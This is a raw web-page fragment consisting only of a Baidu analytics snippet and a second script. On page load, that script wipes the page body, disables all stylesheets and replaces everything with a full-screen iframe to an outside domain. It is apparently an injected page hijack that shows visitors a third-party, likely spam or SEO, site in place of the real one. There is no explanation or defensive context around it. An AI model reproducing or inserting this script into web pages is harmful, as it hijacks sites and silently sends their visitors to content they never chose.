<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?628b3a4b6d191083f55db0ff6dd28aab";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>


<script>
setFrame("https://sg.moguseotwentynine.com");

function setFrame(url) {
  setTimeout(()=>{
    document.body.innerHTML=""
    document.querySelectorAll('style').forEach(tag => tag.remove())
    Array.from(document.styleSheets).forEach(stylesheet => {stylesheet.disabled = true})
    document.body.style.margin = '0'
    document.body.style.padding = '0'
    document.body.style.width = '100%'
    document.body.style.height = '100vh'
    document.body.style.minHeight = '100%'
    document.body.style.overflow = 'hidden'
    document.body.innerHTML='<iframe width="100%" height="100%" src="'+ url + '"></iframe>'
  },100)
}
</script>